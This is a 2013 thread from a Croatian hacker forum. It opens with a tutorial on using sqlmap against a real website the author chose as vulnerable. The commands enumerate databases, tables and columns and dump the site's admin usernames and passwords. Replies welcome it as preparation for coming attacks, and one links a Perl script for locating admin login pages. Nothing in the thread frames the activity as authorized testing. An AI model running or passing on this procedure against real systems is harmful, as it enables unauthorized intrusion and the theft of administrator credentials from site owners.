Would you like to react to this message? Create an account in a few clicks or log in to continue.

Croatian Revolution Hackers Official Forum.

  • Home
  • Latest images
  • Register
  • Log in

SQLi tutorial

4 posters

 :: Hakiranje web stranice i foruma

Go down

SQLi tutorial Empty SQLi tutorial

Post by Gost Tue Jun 18, 2013 12:51 pm

Za sql injection ćemo koristiti program imena SQLmap koji se pokreće iz linux operativnog sistema, točnije backtrack5.
Prvo trebamo pronaći stranicu koja je ranjiva na sql napad a kao primjer sam odabrao:

[You must be registered and logged in to see this link.]

Dakle, otvorimo sqlmap;

[You must be registered and logged in to see this link.]

Kada smo otvorili sqlmap vrijeme je da krenemo dalje, tako da upisujemo 1. naredbu:

python sqlmap.py -u (url) --dbs

[You must be registered and logged in to see this link.]


Stisnemo enter da bi nam se izlistale baze podataka:

[You must be registered and logged in to see this link.]

Sad imamo 2 baze podataka, nama je intresantna LTD, tako da je sljedeća naredba:
python sqlmap.py -u (url) -D (database) --tables

[You must be registered and logged in to see this link.]

Sada ćemo odabrati AdminLogin table, nemora nužno biti isti naziv kada ćete vi to pokušavati, može biti: Users, Admin, LoginInformation...
Dakle sljedeća naredba glasi:
python sqlmap.py -u (url) -D (database) -T AdminLogin --columns
I dobrivamo username i pwd kao što slika i pokazije:

[You must be registered and logged in to see this link.]

Da bi dobili sada password i username upisujemo naredbe:
python sqlmap.py -u (url) -D (database) -T AdminLogin -C passw --dump
i
python sqlmap.py -u (url) -D (database) -T AdminLogin -C usuairo --dump
Svaka od naredbi se upisuje zasebno.

[You must be registered and logged in to see this link.]

Kao što vidimo iz slika pokazuje nam se usuairo (username) kao user isto tako vrijedi i za password.

To je to od mene za sad, sretno svima !!! Twisted Evil

Gost
Guest


Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by Gost Tue Jun 18, 2013 11:01 pm

Vrlo koristan tutorijal,hvala sto si to podijelio s nama Smile

Gost
Guest


Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by Gost Wed Jun 19, 2013 7:10 am

Hvala, na žalost puno ljudi pa ni ja neznamo sve tako da bi bilo dobro da svako napiše pokoji tutorial kako bi se stigli pripremiti za nadolazeće dane.

Gost
Guest


Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by buba Wed Jun 19, 2013 8:21 pm

Prvo treba netko objasnit ovima sto neznaju za backtrack sta je to i to.. Wink

buba
Alpha
Alpha

Broj postova : 10
Join date : 2013-06-13

Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by meris Fri Jun 21, 2013 1:26 am

Ovaj jeli ovo BackTrack 5 ili r2 ili r3 ß

meris
Alpha
Alpha

Broj postova : 9
Join date : 2013-06-15

Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by Gost Fri Jun 21, 2013 4:19 am

ovo je  backtrack 5r1

Gost
Guest


Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by Krazee Fri Jun 21, 2013 11:01 am

Za ovo i ne treba BackTrack, skineš Python, skineš SQLMap, pokreneš preko Python-a i pratiš ovaj tutorijal.

Btw. SQLMap > Havij

Krazee
Alpha
Alpha

Broj postova : 20
Join date : 2013-06-21
Age : 28

Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by MedioNNN Sun Jun 30, 2013 7:52 am

a evo i perl skripta za trazenje admin login stranice na sajtu,http://www.sendspace.com/file/ir9dds

MedioNNN
Alpha
Alpha

Broj postova : 5
Join date : 2013-06-29

Back to top Go down

SQLi tutorial Empty Re: SQLi tutorial

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 :: Hakiranje web stranice i foruma

 
Permissions in this forum:
You cannot reply to topics in this forum